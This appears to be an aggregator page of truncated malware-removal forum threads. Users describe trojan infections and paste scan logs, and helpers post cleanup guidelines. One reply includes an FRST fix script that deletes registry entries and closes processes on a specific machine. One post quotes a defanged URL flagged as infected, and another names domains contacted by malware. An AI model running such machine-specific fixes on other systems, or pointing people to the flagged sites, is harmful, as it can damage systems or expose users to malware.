Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.

Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.

Please copy and paste all logs into your post unless directed otherwise. Please do... Read more

30 more replies
Answer Match 50.4%

I've been trying to disinfect this computer for a friend, and more viruses keep coming back. I've scanned with AVG 8 free (main antivirus), Malwarebytes, SDFix, and SUPERAntiSpyware. For a little while it wouldn't log on normally, only showing the background with no icons or system tray, but I got in safe mode and ran Malwarebytes and cleaned the registry and all files with CCleaner and I can now log on again.

Currently, AVG resident shield continually pops up with infected items, on open of certain folders and files, and on startup with a bunch. Some viruses it's told me it found were adware generic3.akgs, trojan downloader bho.hun (i think), and some registry infections of ms juan and new juan.

HiJack This Log
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 6:21:50 PM, on 2/21/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Intel\IntelDH\CCU\AlertService.exe
C:... Read more

A:infected trojan downloader/ms juan/win32 heur

Hi,
I have bad news for you. I see you're dealing with Virut on top of the other nasty malware you are dealing with. In that case, it's unfortunately a lost case - Game over situation and a format and reinstall is the fastest and especially the safest solution.

You may want to read this why: Virut and other File infectors - Throwing in the Towel?

So, I suggest you to start backup all of your valuable data/documents/pictures/movies/songs/etc.. Do NOT backup any applications/installers and Do NOT backup any .exe/.scr/.htm/.html/.xml/.zip/.rar files... This because these files may be infected as well. If you back them up and replace them afterwards, it will infect your computer again.

Read here for instructions how to format and reinstall Windows: http://web.mit.edu/ist/products/winxp/adva...all-format.html

4 more replies
Answer Match 50.4%

AVG found and "removed" six infections during my daily scan. I uninstalled my spam filter (by Codeode), which seemed to be the source of, or harbor for, the infections. They were found again last night (see below). Any ideas? I'm wondering why AVG didn't catch and prevent the infections in the first place. From what I've read, they seem bad. THANK YOU.

AVG Scan History - Infections Detail
"C:\Documents and Settings\Administrator.HOME\Application Data\com.codeode\Cactus Spam Filter 2.13\training\107B4E6E60547F1F630E352B01624A33645856D0";"Virus found Win32/Heur";"Moved to Virus Vault"
"C:\Documents and Settings\Administrator.HOME\Application Data\com.codeode\Cactus Spam Filter 2.13\training\107B4E6E60547F1F630E352B01624A33645856D0:\D1074a060.zip";"Virus found Win32/Heur";"Moved to Virus Vault"
"C:\Documents and Settings\Administrator.HOME\Application Data\com.codeode\Cactus Spam Filter 2.13\training\107B4E6E60547F1F630E352B01624A33645856D0:\D1074a060.zip:\D1074a060.exe";"Virus found Win32/Heur";"Moved to Virus Vault"
"C:\Documents and Settings\Administrator.HOME\Application Data\com.codeode\Cactus Spam Filter 2.13\training\45337C5D5A0733430F6B04741239141559272860";"Trojan horse BackDoor.Generic11.ALD... Read more

More replies
Answer Match 50.4%

A couple of days ago I updated my AVG. I'm not sure what happened, but during the process my antivirus was disabled, and the computer was attacked by a virus or hijacker. It would not let me update the AVG, redirected me, changed my homepage, would not let me access the net. It changed my settings and modified my display, removed my wallpaper. In my Internet Properties, I disabled add ons under manage add ons that looked unfamiliar to me.

Live365Player Class
(not verified) Live365.com

MCCWrqapper Obj Class
(not verified) Motive Communications, Inc.

MJ Launcher Ctrl Class
(not verified) Mumbo Jumbo
BDSCANONLINE

With that I was able to access the net, and complete the update to my AVG. I rebooted. My desktop is now blue with wording and a link that says "Warning: Spyware threat has been detected on your PC" below it a live link that says "Click Here To Scan For Spyware". I have a strange icon in my system tray that is a crude looking warning icon with an exclamation point that pops up a message and that has several different warnings. "Click for security updates, your computer is infected with spyware, click here to run a full system scan", etc.

I also get warnings from AVG: Danger: AVG Search-Shield has detected active threats on this page and has blocked access for your protection. The page you are trying to access has been identified as a known exploit, phishing, or social engineering web site and therefore has been blocked for your safety. Wi... Read more

A:Solved: Trojan horse Generic10.QTX, Win32/Heur Please Help.

16 more replies
Answer Match 50.4%

I have Charter Security Suite (F-Secure Antivirus) installed and the history shows the 2 files have attempted to be cleaned but without success. I couldn't understand their help documents to manually clean them, so I am asking for your help. You all helped me once before with great success, I am hoping you can do it again! Thank you.

DDS (Ver_09-12-01.01) - NTFSx86
Run by Michele at 7:19:32.14 on Mon 03/15/2010
Internet Explorer: 8.0.6001.18702
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.511.127 [GMT -5:00]

AV: Charter Security Suite 9.01 *On-access scanning enabled* (Updated) {E7512ED5-4245-4B4D-AF3A-382D3F313F15}
FW: Charter Security Suite 9.01 *enabled* {D4747503-0346-49EB-9262-997542F79BF4}

============== Running Processes ===============

H:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
H:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
H:\WINDOWS\System32\svchost.exe -k eapsvcs
svchost.exe
H:\WINDOWS\System32\svchost.exe -k dot3svc
H:\WINDOWS\system32\spoolsv.exe
svchost.exe
H:\WINDOWS\system32\netdde.exe
H:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
H:\Program Files\Bonjour\mDNSResponder.exe
H:\WINDOWS\system32\clipsrv.exe
H:\Program Files\Charter Security Suite\Anti-Virus\fsgk32st.exe
H:\Program Files\... Read more

A:Trojan.Generic.2187084, [email protected]

Hi,
Welcome to Bleeping Computer. My name is m0le and I will be helping you with your log.

Please subscribe to this topic, if you haven't already. You can subscribe by clicking the Options box to the right of your topic title and selecting Track This Topic.

Please avoid installing/uninstalling or updating any programs and attempting any unsupervised fixes or scans. This can make helping you impossible.

Please reply to this post so I know you are there. The forum is busy and we need to have replies as soon as possible. If I haven't had a reply after 3 days I will bump the topic and if you do not reply by the following day after that then I will close the topic.

Once I receive a reply then I will return with your first instructions.
Thanks

8 more replies
Answer Match 50.4%

I have a Dell home PC with Windows XP with Kaspersky 2011 on it. I have a virus that I can not fix using my Kaspersky program so far. The virus is heur:trojan script generic. I need simple instructions to remove this please.

A:removal of Heur:trojan scripts generic virus

Hello, I moved this to the Am I Infected forum. Does the KIS detected log say infected (nothing about removal) with the time stamp? Or what exactly does the log say about the finding?

1 more replies
Answer Match 50.4%

Here's what I know. I have been given my husband's old computer; upon receiving it I went to try and update Windows to SP3. The computer installed but then would stall at the Windows loading screen. I uninstalled the update and ran Kaspersky 8.0.0.454, which then told me of numerous instances of HEUR:Worm.Win32.Generic. I tried to quarantine them from the report page but that did nothing. I have since rerun the scan and managed to catch 6 pop up boxes from Kaspersky to quarantine the worm. Only to run another full scan and find more copies still plus now Trojan.JS.Agent.ja and Trojan-Downloader.JS.plif.a
I am wondering if the worms are even getting quarantined at all and how each scan still finds them and now the trojans that it didn't seem to see before.

This is a Dell XPS Gen 4 running Windows XP SP2

Would really appreciate some advice, here is the HijackThis log:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:42:33 PM, on 3/31/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2009\avp.exe
C:\Program Files\... Read more

A:HEUR:Worm.Win32.generic and Trojan Program

BUMP
Please help, thanks
 

1 more replies
Answer Match 50.4%

Bit Defender popped up and prompted me letting me know that these two viruses were id'd but could not be quarantined/removed. Here is the DDS log. GMER crashed my computer twice in a row so it will not run. No other errors yet.

DDS (Ver_10-03-17.01) - NTFSx86
Run by user at 9:55:13.51 on Sat 07/31/2010
Internet Explorer: 8.0.6001.18928
Microsoft Windows Vista Home Premium 6.0.6002.2.1252.1.1033.18.3261.1970 [GMT -6:00]

AV: BitDefender Antivirus *On-access scanning enabled* (Updated) {6C4BB89C-B0ED-4F41-A29C-4373888923BB}
SP: BitDefender Antispyware *enabled* (Updated) {8B2012EC-32D4-494F-BC03-832DB3BDF911}
SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}
FW: BitDefender Firewall *enabled* {4055920F-2E99-48A8-A270-4243D2B8F242}

============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k secsvcs
C:\Program Files\Common Files\BitDefender\BitDefender Update Service\livesrv.exe
C:\Program Files\BitDefender\BitDefender 2009\vsserv.exe
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32&... Read more

A:Infected with [email protected] and variant.hiloti.1

Hello and welcome to Bleeping Computer. We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not, please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.
Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
Download DDS by sUBs from one of the following links. Save it to your desktop.
DDS.scr
DDS.pif
Double click on the DDS icon, allow it to run.
A small box will open, with an explanation about the tool. No input is needed, the scan is running.
Notepad will open with the results.
Foll... Read more

2 more replies
Answer Match 50.4%

AVG got most of the trojan. One dll that was found corrupt - c:windows\system32\clbdll.dll - was moved to the vault by AVG, but I still have issues - ran thru the 5 steps -
winXP SP3 will not load - windows cannot find clbcatq.dll or clbcatex.dll
I tried both SP3 and SP3 for IT Professionals. I'm running WinXP Home Ed.
Did not go into the COM+ fix.
-----------------------------------------------------------------------
ActiveScan.txt attached.
-----------------------------------------------------------------------
Deckard did not create an "extra.txt" file, but here's main.txt:
-----------------------------------------------------------------------

Deckard's System Scanner v20071014.68
Run by Owner on 2008-08-03 04:44:48
Computer is in Normal Mode.
--------------------------------------------------------------------------------

-- HijackThis (run as Owner.exe) -----------------------------------------------

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 4:47:01 AM, on 8/3/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WIN... Read more

A:heur trojan mess - Cannot Update OS - SP3 cannot find CLBCATQ dll's

Hello and welcome to TSF.

Sorry for the delayed response. If you have not received help elsewhere and still need help please post a fresh main.txt produced by the Deckard's System Scanner, as it has been a while since you posted.

19 more replies
Answer Match 50.4%

My AVG and Avast have picked up these trojans: trojan horse bho.eiz, trojan horse vund.t and win32/heur. I have tried the Panda site but it wouldn't scan for me so then I came to this site to see if someone could help me. I have followed all the steps on the preparation page. When I did step 5 it didn't find anything and wouldn't let me copy a log to paste to you.

MAIN.TXT
Deckard's System Scanner v20071014.68
Run by AuSSie` on 2008-06-15 07:48:19
Computer is in Normal Mode.
--------------------------------------------------------------------------------

-- Last 5 Restore Point(s) --
11: 2008-06-14 16:17:42 UTC - RP145 - Windows Update
10: 2008-06-14 09:57:20 UTC - RP144 - Windows Update
9: 2008-06-14 09:43:37 UTC - RP143 - Restore Operation
8: 2008-06-14 09:31:30 UTC - RP142 - Restore Operation
7: 2008-06-14 06:26:17 UTC - RP141 - Windows Update

-- First Restore Point --
1: 2008-06-10 06:01:26 UTC - RP134 - Scheduled Checkpoint

Backed up registry hives.
Performed disk cleanup.

-- HijackThis (run as AuSSie`.exe) ---------------------------------------------

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 7:51:34 AM, on 15/06/2008
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Motorola\SMSERIAL&#... Read more

A:Infected With Trojan Horse Bho.eiz Trojan Horse Vundo.t Win32/heur

Hi
First ... you should NOT be running 2 anti-virus programs, they will conflict ... choose between AVG8 & Avast ... keep one & uninstall the other ...

Second ... with the malware showing in your log, I find it hard to believe that the Kaspersky Online Scan found nothing if set to scan My Computer ... If it was not set to scan My Computer, please run it again...

THEN ...
Please Download Malwarebytes' Anti-Malware from Here :-
http://www.majorgeeks.com/Malwarebytes_Ant...ware_d5756.html
or here :-
http://www.besttechie.net/tools/mbam-setup.exe
Double Click mbam-setup.exe to install the application.
* Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
* If an update is found, it will download and install the latest version.
* Once the program has loaded, select "Perform Quick Scan", then click Scan.
* The scan may take some time to finish, so please be patient.
* When the scan is complete, click OK, then Show Results to view the results.
* Make sure that everything is checked, and click Remove Selected.
* When disinfection is completed, a log will open in Notepad and you may be prompted to Restart.
* The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.
* Copy and Paste the entire report in your next reply.

THEN ...
Please follow these directions to run Combofix & post a log.
http://www.bleepingcomputer.com/combofix/how-to-use-combofix

steam
EDIT ... What are th... Read more

2 more replies

Hello there,
I've been experiencing some BSODs lately, I've fixed most of them by updating some drivers, but some are still appearing every two or three days.
I have run a full computer scan with Kaspersky Anti-Virus and nothing came up. The only thing was the alert which appeared a few days ago:
 
HEUR:Trojan.Win32.Generic   was recognised.
Object in \Device\Harddisk0\DR0
 
I do not have experience with such things so I'm asking you for help. 
 
My PC is not old, I have it for almost a year now, my system has NVIDIA GeForce GTX 670, Intel Core i7-3770K, 2x4 RAM and it's a Windows 7 Home Premium 64 bit operating system.
 
I have also run BlueScreenView, but I am not sure which files you need to see some information. I hope it's about the .dmp files, so here are the 5 latest .dmp files from this month:

http://speedy.sh/7eB6t/Desktop.rar
I thank you in advance for your replies,
~ShrimpPL

A:BSODs and HEUR:Trojan.Win32.Generic \Device\Harddisk0\DR0

Hello ShrimpPL

I would like to welcome you to the Malware Removal section of the forum. Around here they call me Gringo and I will be glad to help you with your malware problems.

Very Important --> Please read this post completely, I have spent my time to put together some things for you to keep in mind while I am helping you to make things go easier, faster and smoother for both of us!

Please do not run any tools unless instructed to do so.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.

Please do not attach logs or use code boxes, just copy and paste the text.
Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.

Please read every post completely before doing anything.
Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.

Please provide feedback about your experience as we go.
A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same"... Read more

39 more replies

I'm using Kaspersky antivirus on a Win XP system, and this program has found two viruses with this description: HEUR:Trojan.Win32.Invader. I've tried to quarantine them, like the program indicates me to do; after that I tried to clean the infected archives and also tried to delete them manually, but Kaspersky always says to restart the PC, and when I do it, Kaspersky continues to alert the same problem.

This is the local address where the archive is: c:\program files\GBplugin\gbiehcef.dll

what can I do to solve it?!

thanks for the patience, I'm not so good with this language

A:HEUR:Trojan.Win32.Invader - I cannot clean or quarantine this! / Moved

I am shifting this topic from the XP forum to the Am I Infected forum where folks can assist you with this issue. ~ OB

2 more replies

Hello- I am reading through the 'Preparation Guide' and following each step closely for maximum efficiency.

Problems started a few nights ago when I was roaming the internet; I wasn't using my Windows Firewall--but have now enabled it as suggested. I use Kaspersky anti-virus (7.0.1.325) - it told me I'd become infected with various Trojans [Trojan.Clicker.Win32.Delf.cbe, Heur.Invader, etc] --- it listed the affected file as C:\WINDOWS\system32\jvwfeead.dll but was unable to delete the file. I tried to do it manually and it gave me access denied messages. My computer slowed and programs didn't want to open. Everything began to freeze up and I had to manually turn off my computer several times before I could get Malwarebytes Anti-Malware to run... It removed a few files but it can't seem to do anything with 4 files [it calls them Vundo]. I've also run combofix, and it found other files it removed, but it also cannot touch some of them. One of the programs mentioned this file is infected: c:\windows\system32\mwvzxdl.dll (although I cannot remember which one) -- however none of my programs will let me delete it, nor does it allow me to manually delete it.

My system is now running fairly smoothly, but I know I am still infected. Visiting sites like 'deviantart' causes my system to go into a frenzy, and the virus seems to redownload itself at random. I haven't had any popups---just extreme slowness, programs freezing or refusing to load, etc. And t... Read more

A:Trojan Dropper/Clicker/Vundo/Heur and other nasties have infected me...

Hello Lisa and welcome to BleepingComputer.com

In the upper right hand corner of the topic you will see a button called Options. If you click on this in the drop-down menu you can choose Track this topic. By doing this and then choosing Immediate E-Mail notification and then clicking on Proceed you will be advised when we respond to your topic and facilitate the cleaning of your machine.

After 5 days if a topic is not replied to we assume it has been abandoned and it is closed.

Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.

I am currently looking at your thread and will post back with instructions soon,

regards
_temp_

3 more replies

Hi, my XP PC is infected with all of these and is being hijacked.
I could not access 'Add/Remove' in Windows; my Windows programs are not running properly.
I downloaded ComboFix (2) & Malwarebytes etc., but the computer would not let me run them.
I could not control which website I went to, and sometimes it's being hijacked to some horrible website.
I had downloaded DDS but it now would not let me open it and post/upload to this forum.
I am a novice with computer technology... please kindly advise me what I should do now.
And my IE browser has gone too... I can now only use Firefox; before that they both worked OK.
I detected all these viruses by scanning with free AVG 8.5, and my firewall is the free PC Tools one.
Please help...

Hi, any response please.
As now I have lost control of my Windows, it stops me doing lots of access.
Do I really need to re-install XP? Can anyone tell me how to do that?
And would I lose every other pre-factory-installed software, e.g. Nero? I don't have a backup disc for that; does that mean I could not use my DVD re-writer or re-open any backup there?
Help please... Please... Moreover, it would let me go to lots of websites and it limits my resources to find helpful sites to remove them.
By the way, I think my PC has Vundo B.
I am now so afraid to go on the internet, as I worry there's a backdoor open for more attacks.
I could not delete files now to protect my personal details before I go on the internet, and I worry that if I check my Yahoo email account someone would detect my password etc. It's ... Read more

A:win32/Heur, Win/Virut & Trojan Horse clicker.ADLV

As no logs have been posted, I am shifting this topic from the specialized HiJack This forum to the Am I Infected forum.==>PLEASE DO NOT NOW POST LOGS<== unless a log is specifically requested.

2 more replies

In the last week, whenever I try to open a web page that I frequently use, I get this message from my anti-virus software.

Kaspersky
Anti-Virus
ACCESS DENIED
The requested URL cannot be provided

The requested object at the URL:

hxxp://www.calebgattegno.org/ < warning DO NOT CLICK ON THIS LINK >

Detected:

object is infected by HEUR:Trojan.Script.Generic
Message generated on: 29-07-2014 16:02:48

I went through your post and noticed that another member had asked the same question to you. You had advised the member to download TDSSKIller and FRST. I also did the same and generated four reports, which I am attaching with this mail. Please let me know how I can proceed further. You can find the details of my system as below:

Tech Support Guy System Info Utility version 1.0.0.2
OS Version: Microsoft Windows 7 Home Basic, Service Pack 1, 64 bit
Processor: Intel(R) Core(TM) i3 CPU M 330 @ 2.13GHz, Intel64 Family 6 Model 37 Stepping 2
Processor Count: 4
RAM: 3892 Mb
Graphics Card: Intel(R) Graphics Media Accelerator HD, 1722 Mb
Hard Drives: C: Total - 235677 MB, Free - 161880 MB; E: Total - 99999 MB, Free - 49833 MB; F: Total - 131531 MB, Free - 28340 MB;
Motherboard: Dell Inc., 0FR6M4
Antivirus: Kaspersky Anti-Virus, Updated and Enabled

I would be very grateful for your early reply, as I am afraid that this virus may cause serious damage to my system.
 

A:Heur:Trojan:Script:Generic virus not allowing me to open a web page

7 more replies

Kaspersky detected HEUR:Trojan.Script.iframer or lframer; at the same time a .dll was whitelisted, maybe related to a JavaScript on a webpage.
Computer OS: Windows 10
Antivirus: Kaspersky 2016
I clicked this page yesterday through Google.
abduzeedo.com/star-wars-concept-art-ralph-mcquarrie
- After the page loaded, what was probably a Kaspersky alert window soon appeared together with a sound.
- It said it detected HEUR:Trojan.Script.iframer or HEUR:Trojan.Script.lframer (I am not sure whether that was a capitalized i or an l).
- I clicked the alert window several times, maybe 4-5 times, probably out of reflex because I wanted to close it, which may have closed the window (alert window) each time, so I maybe got this window to appear several times in a short time span. (I'm sorry for my bad explanations.)
I think the window may have been red.
I might have seen the word whitelist on one of these windows, and this wasn't on the first window that appeared.
The problem is I am not used to Windows 10 and Kaspersky 2016 and I don't know what an alert window about a blocked object looks like, and whether there are buttons inside the window that I ended up clicking.
But what I've deduced is that if HEUR:Trojan.Script.iframer downloaded some object (trojan etc...), it is possible that I may have unknowingly whitelisted it when I quickly clicked on the Kaspersky alert window(s) that flashed.
 
And I closed the web page after the thing with those alert windows.
I checked Kaspersky's log, and what I... Read more

A:Kaspersky detected HEUR:Trojan.Script.iframer or lframer, .dll whitelisted

Hi there,

my name is Jo and I will help you with your computer problems.

Please follow these guidelines:
Read and follow the instructions in the sequence they are posted.
Print or copy & save instructions.
Back up all your private data / music / important files on another (external) drive before using our tools.
Do not install / uninstall any applications, unless otherwise instructed.
Use only the tools you have been instructed to use.
Copy and paste the log files inside your post, unless otherwise instructed.
Ask for clarification, if you have any questions.
Stay with this topic till you get the all clean post.
My first language is not English. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.

***

Download Security Check by screen317 from here or here.
Save it to your Desktop.
Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
Vista / Windows 7/8 users right-click and select Run As Administrator.
A Notepad document should open automatically called checkup.txt; please post the contents of that document.

***

Please download Malwarebytes Anti-Rootkit and save it to your desktop.
Be sure to print out and follow the instructions provided on that same page.
Caution: This is a beta version so please be sure to read the disclaimer and back up all your data before using.
Scan your system for malware
With some infections, you may see two message boxes.
'Could not load protection driver'. Click 'OK'.
'Could ... Read more

22 more replies

I don't know how to remove them, our computer automatically shuts down sometimes.

DDS (Ver_09-09-29.01) - NTFSx86
Run by user at 20:03:13.70 on Thu 10/01/2009
Internet Explorer: 8.0.6001.18702
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.511.192 [GMT 8:00]
============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
svchost.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe
C:\WINDOWS\system32\WgaTray.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\VMSnap3.EXE
C:\WINDOWS\Domino.EXE
C:\WINDOWS\Mixer.exe
C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Documents and Settings\user\Application Data\Transcend\JFSW2\JFSW2Launch.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\WINDOWS\explorer.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\internet explorer\iexplore.exe
C:\Program Files\inte... Read more

A:Infected with Win32/Heur, Adware Toolbar.GP, Trojan Horse, Worm

Hello my name is Sempai and welcome to Bleeping Computer.

*We apologize for the delay. Forum have been busy.
*I want you to understand that I'm still a trainee here. I will be working with my Coach who will approve all my instructions before posting them to you, so there's a possibility to have some delays in my responses. But the good part is, there are two people reviewing your problem instead of one.
*It is important not to make any further changes or run any other tools unless instructed to. This may hinder the cleaning process of your machine.
*You must reply within 5 days otherwise this topic will be closed.

Your log will be analyzed and you will be instructed on what to do next as soon as possible.

13 more replies

Hello! My computer has been infested with some kind of a Trojan/rootkit/TDSS. Kaspersky Internet Security 2010 keeps showing the same pop-up windows that SVCHOST.exe is trying to access the lenina66 and mfdclk001.org website. It also causes crashes of Firefox and Opera and diverts pages from IE.
I ran ATF Cleaner, CCleaner, Java cache clean-up, Malwarebytes' Anti-Malware, SUPERAntiSpyware Free, KIS quick-scan; it didn't help getting rid of this.
Here is the KIS screenshot:

Merged posts. ~ OB

A:HEUR:Trojan.Win32.Generic / Lenina66.exe / Nasty TDSS virus?

Hello, Atmosphereo

Welcome to the Bleeping Computer Forums. My name is Jat, and I will be helping you with your situation.

If you do not make a reply in 5 days, we will have to close your topic.

You may want to keep the link to this topic in your favourites. Alternatively, you can click the button at the top bar of this topic and Track this Topic. The topics you are tracking can be found here.

Please take note of some guidelines for this fix:
Refrain from making any changes to your computer including installing/uninstall programs, deleting files, modifying the registry, and running scanners or tools. Doing so could cause changes to the directions I have to give you and prolong the time required. Furthermore, you should not be taking any advice relating to this computer from any other source throughout the course of this fix.
If you do not understand any step(s) provided, please do not hesitate to ask before continuing. I would much rather clarify instructions or explain them differently than have something important broken.
Even if things appear to be better, it might not mean we are finished. Please continue to follow my instructions and reply back until I give you the "all clean". We do not want to clean you part-way, only to have the system re-infect itself.
Please reply using the button in the lower right hand corner of your screen. Do not start a new topic. The logs that you post should be pasted directly into the reply. Only attach them if requested or if t... Read more

1 more replies

Hi,
 
Yesterday I started getting popups from Kaspersky, stating that it is blocking malicious URLs, even when there is no webpage open and running. When I checked the detailed reports, I saw that it is blocking a trojan named "HEUR:Trojan.Script.Iframer". I ran AdwCleaner and RKill. Then I restarted the computer, which made me realize the popups start when the computer is booted, even before any browser is open. I googled some stuff and installed Malwarebytes and ran a scan with it. It found some malicious files and cleaned them, but it didn't solve the issue. Malwarebytes also started to show some popups with different ports and IPs but the same process, which is "svchost.exe". The popups come up on startup, when a browser is launched, when a new tab is opened even if it is an empty tab, or sometimes when the computer is idle.
 
It is really frustrating as I ran many scans with different tools and none of them seemed to fix the issue. I tried to explain the problem as detailed as possible, the screenshots of the popups are attached. Any help will be appreciated.
 
The log of AdwCleaner is pasted below and the Farbar logs are attached to give it a head start. I couldn't paste the Farbar logs because it didn't let me post a message that long, so I attached them. Looking forward to hearing from you soon.
 
Thanks.
 
# AdwCleaner v4.104 - Report created 10/12/2015 at 00:27:35
# Updated 05/12/2014 by Xplode
# Database : 2015-12-07.3 [Live]
# Operating System : Windows 7 H... Read more

A:HEUR:Trojan.ScriptIframer constantly blocking malicious urls with svchost.exe

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.
If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===
Remove these programs in bold via the Control Panel > Programs and Features applet.
Internet Explorer için Yandex.Bar 6.7 (HKLM-x32\...\{1D1E60B4-BE61-4219-BDF1-5A7622412130}) (Version: 6.7.0.1913 - Yandex)
Popcorn Time (HKU\S-1-5-21-2870111626-1301175785-2031466506-1002\...\Popcorn Time) (Version: - Popcorn Official)
===
ATTENTION: System Restore is disabled
How to: Turn System Restore ON - Windows < Important
http://windows.microsoft.com/en-ca/windows/turn-system-restore-on-off#1TC=windows-7
<<<>>>
Press the windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.
Please copy the entire contents of the code box below to a new file.
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\...\Run: [ROC_JAN2013_TB] => "C:\Program Files (x86)\AVG Secure Search\ROC_JAN2013_TB.exe" /PROMPT /CMPID=JAN2013_TB
HKU\S-1-5-21-2870111626-1301175785-2031466506-1000\...\Run: [AVG-Secure-Search-Update_JUNE2013_TB] => "C:\Program Files (x86)\AVG Secure Search\AVG-Secure-Search-Update_JUNE2013_TB.exe" /PROMPT /CMPID=JUNE2013_TB
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
Tool... Read more

16 more replies

Sadly, I am not just saying "Hello, I'm a new member". I am an unhappy, infected member.
I have made many attempts with MalwareBytes and ZoneAlarm Extreme scans over the past few days (both in and out of Safe Mode) and am unable to rid my pc of these pests: Trojan-Banker.Win32.Banbra.advx ; HEUR:Exploit.Script.Generic ; and, also Google Redirect.
Per your instructions, DeFogger was executed and I am attaching DDS.txt, attach.txt, and ark.txt.
Thanks in advance for "being there".
Attached: DDS.txt (8.95KB), Attach.txt (2.16KB), ark.txt (320.57KB)
-----
